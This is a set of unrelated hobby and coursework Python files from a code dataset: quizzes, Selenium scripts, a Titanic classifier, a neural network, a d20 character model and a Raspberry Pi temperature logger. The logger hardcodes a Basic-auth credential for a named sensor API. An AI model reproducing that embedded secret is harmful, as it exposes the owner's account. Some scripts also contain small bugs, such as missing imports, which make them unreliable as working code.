game/CoinCounter.py","file_name":"CoinCounter.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"387294717","text":"from capitals import capitals_dict\nimport random\n\ndone = True\nstates = []\n\nwhile done is True:\n for k in capitals_dict:\n states.append(k)\n\n s = random.choice(states)\n c = capitals_dict[s]\n\n answer = input('What is the capital of {}? '.format(s))\n if answer.lower() == c.lower():\n print('Correct')\n done = False\n elif answer.lower() is not c.lower():\n end = input('Incorrect answer. Press enter to try another state. Type exit to end the game. ')\n if end.lower() == 'exit':\n print('The correct answer was {}. Goodbye.'.format(c))\n done = False\n","sub_path":"RealPythonPart1-v2.2.0/capital_city_loop.py","file_name":"capital_city_loop.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"164986716","text":"from modules.util import (to_float, DictColl)\nimport re\nclass Upgrade(object):\n def __init__(self, val=0, name=\"\", avail=False, base_importance = 0, trimps=None):\n self.val = to_float(val)\n self.avail = avail\n self.base_importance = base_importance\n self.importance = base_importance\n self.trimps = trimps\n self.driver = trimps.driver\n self.name = name\n\n def purchase(self):\n elem = self.get_element()\n elem.click()\n \n if self.name == \"Bloodlust\":\n self.trimps.actions[\"Fight\"].make_irrelevant()\n\n def get_element(self):\n return self.driver.find_element_by_id(self.name)\n\n def refresh(self):\n try:\n elem = self.get_element()\n self.val = to_float(re.findall(\"\\s(\\S*)\", elem.text)[0])\n self.avail = \"CanAfford\" in elem.get_attribute(\"class\")\n except:\n pass\n\nclass Upgrades(DictColl):\n\n def __init__(self, trimps):\n self.driver = trimps.driver\n self.trimps = trimps\n self.store = {\n \"Coordination\": Upgrade(name=\"Coordination\", trimps = trimps),\n \"Gigastation\": Upgrade(name=\"Gigastation\", trimps = trimps),\n \"Supershield\": Upgrade(name=\"Supershield\", trimps = trimps),\n \"Dagadder\": Upgrade(name=\"Dagadder\", trimps = trimps),\n\n \"Bootboost\": Upgrade(name=\"Bootboost\", trimps = trimps),\n \"Megamace\": Upgrade(name=\"Megamace\", trimps = trimps),\n \"Hellishmet\": Upgrade(name=\"Hellishmet\", trimps = trimps),\n \"Polierarm\": Upgrade(name=\"Polierarm\", trimps = trimps),\n\n \"Pantastic\": Upgrade(name=\"Pantastic\", trimps = trimps),\n \"Axeidic\": Upgrade(name=\"Axeidic\", trimps = trimps),\n \"Smoldershoulder\": Upgrade(name=\"Smoldershoulder\", trimps = trimps),\n \"Greatersword\": Upgrade(name=\"Greatersword\", trimps = trimps),\n \"Bestplate\": Upgrade(name=\"Bestplate\", trimps = trimps),\n \n \"Coordination\": Upgrade(name=\"Coordination\", base_importance=50, trimps = trimps),\n \"Battle\": Upgrade(name=\"Battle\", base_importance=100, trimps = trimps),\n \"Scientists\": Upgrade(name=\"Scientists\", base_importance=100, trimps = trimps),\n \"Efficiency\": Upgrade(name=\"Efficiency\", base_importance=100, trimps = trimps),\n \"Speedminer\": Upgrade(name=\"Speedminer\", base_importance=100, trimps = trimps),\n \"Speedlumber\": Upgrade(name=\"Speedlumber\", base_importance=100, trimps = trimps),\n \"Speedfarming\": Upgrade(name=\"Speedfarming\", base_importance=100, trimps = trimps),\n \"Speedscience\": Upgrade(name=\"Speedscience\", base_importance=100, trimps = trimps),\n \n \"Bloodlust\": Upgrade(name=\"Bloodlust\", base_importance=50, trimps = trimps),\n \"TrainTacular\": Upgrade(name=\"TrainTacular\", base_importance=50, trimps = trimps),\n \"Miners\": Upgrade(name=\"Miners\", base_importance=150, trimps = trimps),\n }\n\n \n def refresh(self):\n for _, build in self.items():\n build.refresh()","sub_path":"main/modules/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"480969217","text":"# Code adapted from https://www.dataquest.io/mission/74/getting-started-with-kaggle/\n# Predicts survival by logistic regression model or random forest model\n\n# Import pandas & numpy & regular expression\nimport pandas as pd\nimport numpy as np\nimport re\n# Sklearn has a helper that makes it easy to do cross validation\nfrom sklearn.cross_validation import cross_val_score\n# Import the logistic regression class\nfrom sklearn.linear_model import LogisticRegression\n# Import the random forest model class\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n### Import data sets ###\ntitanic = pd.read_csv('train.csv', header=0)\ntitanic_test = pd.read_csv('test.csv', header=0)\n\n\n### Data munging! ###\n# Turn females to 0 and males to 1\ntitanic.Sex = titanic.Sex.map({'female':0, 'male':1}).astype(int)\ntitanic_test.Sex = titanic_test.Sex.map({'female':0, 'male':1}).astype(int)\n\n# Set all missing age to median age\n# titanic.Age = titanic.Age.fillna(titanic.Age.median())\n# titanic_test.Age = titanic_test.Age.fillna(titanic.Age.median())\n\n# Fill in missing age to median age by classifying with Pclass & SibSp\nfor i in range(len(titanic.Age)):\n if np.isnan(titanic.Age[i]):\n if titanic.SibSp[i] == 0:\n titanic.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass==titanic.Pclass[i]) & (titanic.SibSp == 0)])\n elif titanic.SibSp[i] > 0:\n titanic.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass==titanic.Pclass[i]) & (titanic.SibSp > 0)])\n else:\n titanic.loc[i,\"Age\"] = np.nanmedian(titanic.Age[titanic.Pclass==titanic.Pclass[i]])\nfor i in range(len(titanic_test.Age)):\n if np.isnan(titanic_test.Age[i]):\n if titanic_test.SibSp[i] == 0:\n titanic_test.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass == titanic_test.Pclass[i]) & (titanic.SibSp == 0)])\n elif titanic_test.SibSp[i] > 0:\n titanic_test.loc[i,\"Age\"] = np.nanmedian(titanic.Age[(titanic.Pclass == titanic_test.Pclass[i]) & (titanic.SibSp > 0)])\n else:\n titanic_test.loc[i,\"Age\"] = np.nanmedian(titanic.Age[titanic.Pclass == titanic_test.Pclass[i]])\n\n# Set all missing fare to median fare by classifying with Pclass\nfor i in range(len(titanic_test.Fare)):\n if np.isnan(titanic_test.Fare[i]):\n titanic_test.loc[i,\"Fare\"] = np.median(titanic.Fare[titanic.Pclass == titanic_test.Pclass[i]])\n\n# Create new column---Titles\n# A function to get the title from a name.\ndef get_title(name):\n # Use a regular expression to search for a title.\n # Titles always consist of capital and lowercase letters, and end with a period.\n title_search = re.search(' ([A-Za-z]+)\\.', name)\n # If the title exists, extract and return it.\n if title_search:\n return title_search.group(1)\n return \"\"\n# Map each title to an integer. Some titles are very rare, and are compressed into the same codes as other titles.\ntitle_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Dr\": 5, \"Rev\": 6, \"Major\": 7, \"Col\": 7, \"Mlle\": 8,\n \"Mme\": 8, \"Don\": 9, \"Dona\": 9, \"Lady\": 10, \"Countess\": 10, \"Jonkheer\": 10, \"Sir\": 9, \"Capt\": 7, \"Ms\": 2}\n# Titles for training set\ntitles = titanic[\"Name\"].apply(get_title)\nfor k,v in title_mapping.items():\n titles[titles == k] = v\ntitanic[\"Titles\"] = titles\n# Titles for test set\ntitles_test = titanic_test[\"Name\"].apply(get_title)\nfor k,v in title_mapping.items():\n titles_test[titles_test == k] = v\ntitanic_test[\"Titles\"] = titles_test\n\n# Create new column---FamilySize\ntitanic[\"FamilySize\"] = titanic[\"SibSp\"] + titanic[\"Parch\"]\ntitanic_test[\"FamilySize\"] = titanic_test[\"SibSp\"] + titanic_test[\"Parch\"]\n\n\n# The columns we'll use to predict the target\n# Available columns (*custom): Pclass, Name, Sex, Age, SibSp, Parch, Ticket, Fare, Cabin, Embarked, Titles*, FamilySize*\npredictors = [\"Pclass\", \"Sex\", \"Fare\", \"Titles\", \"Age\"]\n\n\n# Initialize our algorithm class - CHOOSE ONE\n# alg = LogisticRegression(random_state=1)\nalg = RandomForestClassifier(random_state=1, n_estimators=150, min_samples_split=4, min_samples_leaf=2)\n\n# Generate cross validation folds for the titanic dataset. It return the row indices corresponding to train and test.\n# We set random_state to ensure we get the same splits every time we run this.\nscore = cross_val_score(alg, titanic[predictors], titanic[\"Survived\"], cv=3).mean()\n\n# Train the algorithm using all the training data\nalg.fit(titanic[predictors], titanic[\"Survived\"])\n\n# Make predictions using the test set.\npredictions = alg.predict(titanic_test[predictors])\n\n# Write prediction file to prediction.csv\nsubmission = pd.DataFrame({\n \"PassengerId\": titanic_test[\"PassengerId\"],\n \"Survived\": predictions\n })\nsubmission.to_csv(\"prediction.csv\", index=False)\n\nprint(score)","sub_path":"KaggleTitanic.py","file_name":"KaggleTitanic.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144904123","text":"import task32\nimport task33\nimport task34\nimport task35\nimport numpy as np\n\nclass NeuralNetwork:\n def __init__(self,bias,standard_deviation,in_size,hide_size,out_size):\n self.params = {}\n self.grads = {}\n self.params['W1'] = standard_deviation * np.random.randn(in_size,hide_size)\n self.params['b1'] = np.zeros(hide_size)\n self.params['W2'] = standard_deviation * np.random.randn(hide_size,out_size)\n self.params['b2'] = np.zeros(out_size)\n self.grads['W2'] = None\n self.grads['b2'] = None\n self.grads['W1'] = None\n self.grads['b1'] = None\n self.acc = 0\n self.nums = 0\n self.losscost = 0\n self.Sigmoid = task33.Sigmoid()\n #self.Sigmoid2 = task33.Sigmoid()\n self.ReLU = task32.ReLU()\n self.Affine = task34.Affine()\n self.Affine2 = task34.Affine()\n self.SoftmaxCrossEntropy = task35.SoftmaxCrossEntropy()\n\n def softmax(self,x):\n return np.exp(x) / np.sum(np.exp(x), axis = 0, keepdims = True) \n\n def forward(self, x):\n W1, W2 = self.params['W1'],self.params['W2']\n b1, b2 = self.params['b1'],self.params['b2']\n a1 = self.Affine.forward(x,W1,b1)\n z1 = self.ReLU.forward(a1)\n a2 = self.Affine2.forward(z1,W2,b2)\n #z2 = self.Sigmoid2.forward(a2)\n return a2\n\n def loss(self, x, t):\n y = self.forward(x)\n ans = np.copy(y)\n for i in range(len(y)):\n #print(self.softmax(ans[i]))\n ansnum = np.argmax(self.softmax(ans[i]))\n #print(ansnum)\n ans[i] = np.identity(10, dtype = \"int8\")[ansnum]\n self.nums += 1\n if(np.allclose(ans[i], t[i])):\n self.acc += 1\n self.losscost = self.SoftmaxCrossEntropy.forward(y,t)\n\n def backprop(self, x, t):\n self.loss(x,t)\n dx1 = self.SoftmaxCrossEntropy.backprop()\n #dx2 = self.Sigmoid2.backprop(dx1)\n dx3 = self.Affine2.backprop(dx1)[0]\n self.grads['W2'] = self.Affine2.backprop(dx1)[1]\n self.grads['b2'] = self.Affine2.backprop(dx1)[2]\n dx4 = self.ReLU.backprop(dx3)\n dx5 = self.Affine.backprop(dx4)[0]\n self.grads['W1'] = self.Affine.backprop(dx4)[1]\n self.grads['b1'] = self.Affine.backprop(dx4)[2]\n\n def sgd(self, x, t, learning_rate):\n self.backprop(x,t)\n for key in self.params.keys():\n self.params[key] -= learning_rate * self.grads[key]\n \n\n","sub_path":"day2/task41.py","file_name":"task41.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"432109666","text":"import time\nimport datetime\n\ndef lireFichier (emplacement) :\n fichTemp = open(emplacement)\n contenu = fichTemp.read()\n fichTemp.close()\n return contenu\n\ndef recupTemp (contenuFich) :\n secondeLigne = contenuFich.split(\"\\n\")[1]\n temperatureData = secondeLigne.split(\" \")[9]\n temperature = float(temperatureData[2:])\n temperature = temperature / 1000\n return temperature\n\ndef sauvegarde (temperature_blue, temperature_green, temperature_yellow, date, emplacement) :\n fichierSauvegarde = open(emplacement, \"a\")\n fichierSauvegarde.write(str(date)+\";\")\n fichierSauvegarde.write(str(temperature_blue)+\";\")\n fichierSauvegarde.write(str(temperature_green)+\";\")\n fichierSauvegarde.write(str(temperature_yellow)+\";\")\n temperature_average = (temperature_blue + temperature_green + temperature_yellow) / 3\n fichierSauvegarde.write(str(temperature_average)+'\\r\\n')\n fichierSauvegarde.close()\n\n# fonction pour renseigner les infos dans l'API request\ndef upload_data_api(TEMPERATURE_GREEN, HUMIDITY, TEMP_BLUE):\n API_ENDPOINT = \"https://api.sensorsfolie.xyz/api/sensors\"\n # data to be sent to api\n data = {\n \"humidity_flat\": HUMIDITY,\n \"temp_flat\": TEMPERATURE_GREEN,\n \"temp_paris\": TEMP_BLUE,\n \"id_sensors\": \"ClunyStreet_hackedfridge\"\n }\n\n # headers to be sent to api\n headers = {'Authorization' : 'Basic YWRtaW46VDZoZ0Y4ISVTRA==', 'Accept' : 'application/json', 'Content-Type' : 'application/json'}\n\n # sending post request and saving response as response object\n r = requests.post(url = API_ENDPOINT, data = json.dumps(data), headers = headers)\n\n # extracting response text\n pastebin_url = r.text\n print(\"The pastebin URL is:%s\"%pastebin_url)\n\nwhile True :\n date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n contenuFich_blue = lireFichier(\"/sys/bus/w1/devices/28-fdda8f1d64ff/w1_slave\")\n temperature_blue = recupTemp(contenuFich_blue)\n contenuFich_green = lireFichier(\"/sys/bus/w1/devices/28-f5d58f1d64ff/w1_slave\")\n temperature_green = recupTemp(contenuFich_green)\n contenuFich_yellow = lireFichier(\"/sys/bus/w1/devices/28-97d68f1d64ff/w1_slave\")\n temperature_yellow = recupTemp(contenuFich_yellow)\n sauvegarde(temperature_blue, temperature_green, temperature_yellow, date, \"TemperatureTexte.csv\")\n humidity = 0\n upload_data_api(temperature_green, humidity, temperature_blue)\n\n\n time.sleep(2000)\n\n","sub_path":"TemperatureIntoTxtBG.py","file_name":"TemperatureIntoTxtBG.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"275078759","text":"from selenium import webdriver\nfrom time import sleep\nimport os# os 模块为 python 语言标准库中的 os 模块包含普遍的操作系统功能。主要用于操作本地目录文件。\ndriver=webdriver.Chrome()\ndriver.maximize_window()\n# 打开本地网页\n# path.abspath()方法用于获取当前路径下的文件。另外脚本中还使用到 for 循环,对 inputs 获取的一组元素\nfile_path = 'file:///' + os.path.abspath('checkbox.html')\ndriver.get(file_path)\ndriver.implicitly_wait(5)\n# 选择页面上所有的 tag name 为 input 的元素\ninputs = driver.find_elements_by_tag_name('input')\n\n\n#然后从中过滤出 tpye 为 checkbox 的元素,单击勾选\n# 进行循环,在 python 语言中循环变量(input)可以不用事先声明直接使用。\nfor input in inputs:\n if input.get_attribute('type') == 'checkbox':\n input.click()\n\n\n# 打印当前页面上 type 为 checkbox 的个数\n# len 为 python 语言中的方法,用于返回一个对象的长度(或个数)。\n# 选择所有的 type 为 checkbox 的元素\nprint(len(driver.find_elements_by_css_selector('input[type=checkbox]')))\n\n# pop 也为 python 语言中提供的方法,用于删除指定们位置的元素,pop()为空默认选择最一个元素。\n# 把页面上最后1个 checkbox 的勾给去掉\ndriver.find_elements_by_css_selector('#c3').pop().click()\nsleep(3)\n# 把页面上第一个1个 checkbox 的勾给去掉\ndriver.find_elements_by_xpath('//*[@id=\"c1\"]').pop().click()\nsleep(2)\ndriver.quit()\n\n\n","sub_path":"定位一组元素/定位一组元素checkbox.py","file_name":"定位一组元素checkbox.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288652314","text":"from queue import Queue\nfrom threading import Thread\n\nimport subprocess\n\n\nclass RealTimeSubprocess(subprocess.Popen):\n \"\"\"\n A subprocess that allows to read its stdout and stderr in real time\n\n Parameters\n ==========\n\n cmd\n The command to execute\n write_to_stdout : callable\n Called when chunks of data from stdout are ready.\n write_to_stderr : callable\n Called when chinks of data from stderr are ready.\n\n \"\"\"\n def __init__(self, cmd, write_to_stdout, write_to_stderr):\n self._write_to_stdout = write_to_stdout\n self._write_to_stderr = write_to_stderr\n\n super().__init__(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0)\n\n self._stdout_queue = Queue()\n self._stdout_thread = Thread(\n target=RealTimeSubprocess._enqueue_output,\n args=(self.stdout, self._stdout_queue))\n self._stdout_thread.daemon = True\n self._stdout_thread.start()\n\n self._stderr_queue = Queue()\n self._stderr_thread = Thread(\n target=RealTimeSubprocess._enqueue_output,\n args=(self.stderr, self._stderr_queue))\n self._stderr_thread.daemon = True\n self._stderr_thread.start()\n\n @staticmethod\n def _enqueue_output(stream, queue):\n \"\"\"\n Add chunks of data from a stream to a queue until the stream is empty.\n \"\"\"\n for line in iter(lambda: stream.read(4096), b''):\n queue.put(line)\n stream.close()\n\n def write_contents(self):\n \"\"\"\n Write the available content from stdin and stderr to the\n appropriate destinations.\n\n \"\"\"\n def read_all_from_queue(queue):\n res = b''\n size = queue.qsize()\n while size != 0:\n res += queue.get_nowait()\n size -= 1\n return res\n\n stdout_contents = read_all_from_queue(self._stdout_queue)\n if stdout_contents:\n self._write_to_stdout(stdout_contents)\n stderr_contents = read_all_from_queue(self._stderr_queue)\n if stderr_contents:\n self._write_to_stderr(stderr_contents)\n","sub_path":"jfk_fling/realtime_subprocess.py","file_name":"realtime_subprocess.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222584677","text":"import os\nimport numpy as np\nimport subprocess\nimport pdb\nimport shutil\nimport time\n\ndef create_ndx(name, gro_file, gmxhome, gmxbin, gmxlib):\n\n subprocess.call(['touch', 'RunNDX.sh'])\n file = open('./RunTLEAP.sh','w')\n file.write(\"gmx make_ndx -f npt.gro -o PLCg1.ndx\\n\")\n file.write('gmx make_ndx -f npt.gro -o PLCg1.ndx\\n')\n file.close()\n\n\ndef main():\n # run this code only after the crystalographic water is removed and only a single system is present in\n # the .pdb file (sometimes the crystal contains multiple copies of the protein)\n\n # in the section below the gromacs files are defined\n # -------------------------------------------------------------------------------------------------\n system_name = 'PLCpep7'\n gmxhome = '/usr/local/gromacs'\n binhome = os.path.join(gmxhome, 'bin')\n gmxbin = os.path.join(binhome,'gmx')\n gmxlib = os.path.join(gmxhome,'share/gromacs/top/')\n # -------------------------------------------------------------------------------------------------\n\n gro_file = 'npt.gro'\n subprocess.call(['cp', 'npt.gro', system_name + '_equi.gro' ])\n\n create_ndx(system_name, gro_file, gmxhome, gmxbin, gmxlib)\n\nif __name__ == '__main__':\n main()\n","sub_path":"create_ndx.py","file_name":"create_ndx.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"216903513","text":"from d20.inventory import Inventory\nfrom d20.classes import Class\nfrom d20.dice import Dice\nfrom d20.signals import onDamage, onHeal\nfrom d20.powers import Power\nfrom sgl.core import xml\n\nclass _Meta(object):pass\n\nclass CharacterBase(object):\n\tdef __init__(self):\n\t\tself._first_class_applied = False\n\t\tself.name = ''\n\t\tself.level = 0\n\t\tself.classes = {} # Class and level\n\t\tself.powers = []\n\t\tself.feats = []\n\t\t\n\t\tself.hp = 0\n\t\tself.healing_surges = 0\n\t\t\n\t\tself.speed = 6\n\t\t\n\t\tself.stats = {\n\t\t\t'str':8,\n\t\t\t'dex':8,\n\t\t\t'con':8,\n\t\t\t'int':8,\n\t\t\t'wis':8,\n\t\t\t'cha':8,\n\t\t}\n\t\t\n\t\tself.saves = {\n\t\t\t'ac':10,\n\t\t\t'reflex':10,\n\t\t\t'fortitude':10,\n\t\t\t'will':10,\n\t\t}\n\t\t\n\tdef __getstate__(self):\n\t\td = self.__dict__.copy()\n\t\td['powers'] = [obj.name for obj in d['powers']]\n\t\treturn d\n\t\t\n\tdef __setstate__(self, st):\n\t\tself.__dict__.update(st)\n\t\tself.powers = [Power(obj) for obj in self.powers]\n\t\t\n\t\"\"\"\n\tdef __str__(self):\n\t\treturn self.name\n\t\t\n\tdef __repr__(self):\n\t\treturn '<%s: %s>' % (self.__class__.name, self.name)\n\t\"\"\"\n\t\t\n\tdef load(self, x):\n\t\tx.query(self, 'name')\n\t\t\n\t\txAbil = x.find('abilities')\n\t\tif xAbil is not None:\n\t\t\tfor k in self.stats.keys():\n\t\t\t\ttry:\n\t\t\t\t\tself.stats[k] = int(xAbil.get(k))\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\t\t\n\t\tfor xPath in x.findall('path'):\n\t\t\tcls = xPath.get('class')\n\t\t\tlvl = xPath.get('level')\n\t\t\tif cls and lvl:\n\t\t\t\tself.apply_class(cls, lvl)\n\t\t\t\t\n\t\tself.level = sum(self.classes.values())\n\t\t\n\t\t#log('Loaded %s: %s' % (self.name, self.__dict__))\n\t\t\n\tdef apply_class(self, cls, lvl):\n\t\tlvl = int(lvl)\n\t\tif lvl < 1:\n\t\t\treturn\n\t\tself.classes[cls] = lvl\n\t\t\n\t\tcls = Class(cls)\n\t\t\n\t\t# Apply base values if not set\n\t\tif not self._first_class_applied:\n\t\t\tself._first_class_applied = True\n\t\t\tself.hp = cls.hp_first_level + cls.hp_per_level * (lvl - 1)\n\t\t\tself.healing_surges = cls.healing_surges\n\t\telse:\n\t\t\t# Otherwise just add HP\n\t\t\tself.hp += cls.hp_per_level * lvl\n\t\t\t\n\t\t# Add Defenses\n\t\tself.saves['fortitude'] += cls.fortitude\n\t\tself.saves['reflex'] += cls.reflex\n\t\tself.saves['will'] += cls.will\n\t\t\n\t\t# Add Feats\n\t\tself.feats = list(set(self.feats + cls.feats))\n\t\t\n\t\t# Add free powers\n\t\tif 0 in cls.powers:\n\t\t\tself.powers = list(set(self.powers + cls.powers[0]))\n\t\t\t\n\t\t# FIXME: remove this, only here for testing\n\t\tfor lvl, powers in cls.powers.items():\n\t\t\tif lvl == 0:\n\t\t\t\tcontinue\n\t\t\tself.powers = list(set(self.powers + powers))\n\n\t\t\n\tdef save(self, x):\n\t\tpass\n\t\t\n\tdef calculate_stats(self):\n\t\t# TODO: calculate all possible stats based on current class levels (ex. saves, free feats, free powers)\n\t\tpass\n\t\t\n\tdef validate(self):\n\t\t# TODO: ensure that chose abilities, feats, powers, and stats are valid for this level/class\n\t\tpass\n\t\t\n\tdef mod(self, attr):\n\t\treturn int((self.stats[attr.lower()] - 10) // 2)\n\nclass Character(object):\n\tdef __init__(self, filename = None):\n\t\tself.base = CharacterBase()\n\t\tself.inventory = Inventory()\n\t\tself.meta = _Meta()\n\t\t\n\t\tself.reset()\n\t\t\n\t\tif filename:\n\t\t\tself.load(filename)\n\t\t\n\tdef load(self, x):\n\t\tx = xml.read(x)\n\t\tself.base = CharacterBase()\n\t\tself.inventory = Inventory()\n\t\t\n\t\tself.base.load(x)\n\t\t\n\t\txEquip = x.find('equipment')\n\t\tif xEquip is not None:\n\t\t\tself.inventory.load(xEquip)\n\t\t\t\n\t\tself.reset()\n\t\t\n\tdef reset(self):\n\t\tself.hp = self.base.hp\n\t\tself.temp_hp = 0\n\t\tself.healing_surges = self.base.healing_surges\n\t\t\n\t\tself.saves = self.base.saves.copy()\n\t\t\n\t\tself.powers = self.base.powers\n\t\tself.powers.sort()\n\t\tself.feats = self.base.feats\n\t\t\n\t\tself.speed = self.base.speed\n\t\t\n\t\t\n\t\t# FIXME: some of this can be moved up into Base\n\t\t\n\t\t# Apply stat-based modifiers\n\t\tself.hp += self.base.stats['con']\n\t\tself.healing_surges += self.mod('con')\n\t\t\n\t\t# FIXME: AC should depend on armor\n\t\tself.saves['ac'] += max(self.mod('dex'), self.mod('int'))\n\t\t\n\t\tself.saves['fortitude'] += max(self.mod('con'), self.mod('str'))\n\t\tself.saves['reflex'] += max(self.mod('dex'), self.mod('int')) # TODO: add shield bonus\n\t\tself.saves['will'] += max(self.mod('wis'), self.mod('cha'))\n\t\t\n\t\t#log('%s is ready: %s' % (self.base.name, self.__dict__), type='d20')\n\t\t\n\t@property\n\tdef default_weapon(self):\n\t\treturn self.inventory.right_hand or self.inventory.left_hand\n\n\tdef mod(self, attr):\n\t\treturn int((self.base.stats[attr.lower()] - 10) // 2)\n\t\t\n\tdef is_proficient_with(self, weapon):\n\t\treturn False\n\t\t\n\tdef attack(self, target, atk, defense, weapon=None):\n\t\t\"\"\" Usage: char.attack(target, 'int', 'reflex') \"\"\"\n\t\tdf = target.saves[defense]\n\t\tbonus = self.base.level // 2\n\t\t\n\t\tif weapon and self.is_proficient_with(weapon):\n\t\t\tbonus += weapon.prof\n\t\t\t\n\t\tr = Dice('d20', mod=atk, bonus=bonus).roll(self)\n\t\t\t\n\t\tlog('%s vs %s; %s vs %s' % (atk, defense, r, df), type='d20')\n\t\t\n\t\treturn r >= df\n\t\t\n\tdef heal(self, value, source=None):\n\t\tvalue = int(value)\n\t\tself.hp += value\n\t\t\n\t\tonHeal.emit(self, value, source)\n\t\t\n\t\tlog('%s healed for %s hp' % (self.base.name or 'Creature', value), type='d20')\n\t\t\n\tdef damage(self, value, type=None, source=None):\n\t\tvalue = int(value)\n\t\tself.hp -= value\n\t\t\n\t\tonDamage.emit(self, value, type, source)\n\t\t\n\t\tlog('%s takes %s %s damage' % (self.base.name or 'Creature', value, type or 'normal'), type='d20')\n","sub_path":"d20/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271844263","text":"#-*- coding: utf-8 -*-\n\nfrom django import template\nfrom django.template.defaultfilters import stringfilter\nfrom django.contrib.auth.models import User\nfrom profiles.models import *\nregister = template.Library()\n\n@register.filter\ndef modulo(value1, value2):\n return value1 % value2\n\n@register.filter\ndef size(array):\n\ttry:\n\t\treturn array.count()\n\texcept:\n\t\treturn len(array)\n\n@register.filter\ndef cutText(text):\n if len(text) > 15:\n return text[0:20] + \" ...\"\n\n return text[0:20]\n\n@register.filter\ndef imageUrl(element):\n\treturn element['images']['low_resolution']['url']\n\n############################\n# 0 = Yıl Farklı #\n# 1 = Ay Farklı #\n# 2 = Gün Farklı #\n# 3 = Yıl, Ay, Gün Aynı #\n############################\n\n@register.filter\ndef historyComparison(all_history, index):\n\n\tif index == 0:\n\t\treturn 0 \n\telse:\n\t\tcurrent_history = all_history[index]\n\t\tprevious_history = all_history[index-1]\n\n\t\tif current_history.adding_date.year != previous_history.adding_date.year:\n\t\t\treturn 0\n\t\telif current_history.adding_date.month != previous_history.adding_date.month:\n\t\t\treturn 1\n\t\telif current_history.adding_date.day != previous_history.adding_date.day:\n\t\t\treturn 2\n\t\telse:\n\t\t\treturn 3\n\n\n@register.filter\ndef monthPrev(month_number):\n month_information = {\n \t\"1\":u\"Ocak\", \"2\":u\"Şubat\", \"3\":u\"Mart\", \"4\":\"Nisan\", \n \"5\":u\"Mayıs\", \"6\":u\"Haziran\", \"7\":u\"Temmuz\", \"8\":u\"Ağustos\", \n \"9\":\"Eylül\", \"10\":u\"Ekim\",\"11\":u\"Kasım\", \"12\":u\"Aralık\"\n }\n\n return month_information[str(month_number)] \n\n@register.filter\ndef historyPrev(history):\n\thour = str(history.adding_date.hour) + \":\" + str(history.adding_date.minute)\n\n\treturn hour + \" \" + history.history_searchWord\n \n\n\t\n\n\n","sub_path":"profiles/templatetags/profiles_extra.py","file_name":"profiles_extra.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"435558849","text":"# encoding: utf-8\n\"\"\"\n@version: ??\n@author: chenyitao\n@license: Apache Licence \n@software: PyCharm\n@file: zb_protocol_base.py\n@time: 2018/4/13 12:10\n\"\"\"\nimport json\nimport logging\n\nfrom ..base_protocol import WSProtocolBase\n\nlog = logging.getLogger(__name__)\n\n\nclass ZBWSProtocolBase(WSProtocolBase):\n\n platform = 'zb'\n\n def start(self):\n raise NotImplementedError\n\n def _start(self):\n if self.pairs:\n pairs = list(self.pairs)\n self.src_currency_pairs = pairs\n self.req_currency_pairs = [pair.replace('_', '') + '_ticker' for pair in pairs]\n self.start()\n return\n self.sendMessage('{\"event\": \"addChannel\", \"channel\": \"markets\"}')\n\n def message(self, data):\n raise NotImplementedError\n\n def _message(self, payload, isBinary):\n result = json.loads(payload)\n if result.get('channel') == 'markets':\n self.update_currency_pairs(result)\n return\n self.message(result)\n\n def update_currency_pairs(self, data):\n currency_pairs = data.get('data').keys()\n self.set_pairs(*currency_pairs)\n self._start()\n","sub_path":"worker/extern_modules/zb/zb_protocol_base.py","file_name":"zb_protocol_base.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"388345106","text":"#Autor: Víctor Manuel Rodríguez Loyola\r\n#Conversión de una hora dada en formato de 24 horas al formato de 12 horas\r\n\r\n\r\ndef ConvertirA12Horas(horas, minutos, segundos): #Convierte las hora ingresada por el usuario a formato de 12 horas.\r\n if horas==0:\r\n return 12, 'pm'\r\n\r\n if horas >0 and horas <12:\r\n return horas, 'am'\r\n else:\r\n horasEn12Horas = horas - 12\r\n return horasEn12Horas, 'pm'\r\n\r\n\r\ndef main():\r\n horasEn24Hrs=int(input(\"Teclea las horas: \"))\r\n minutosEn24Hrs= int(input(\"Teclea los minutos: \"))\r\n segundosEn24Hrs=int(input(\"Teclea los segundos: \"))\r\n horaEn12Hrs= ConvertirA12Horas(horasEn24Hrs, minutosEn24Hrs, segundosEn24Hrs)\r\n\r\n if horasEn24Hrs <0 or horasEn24Hrs >23 or minutosEn24Hrs <0 or minutosEn24Hrs >60 or segundosEn24Hrs<0 or 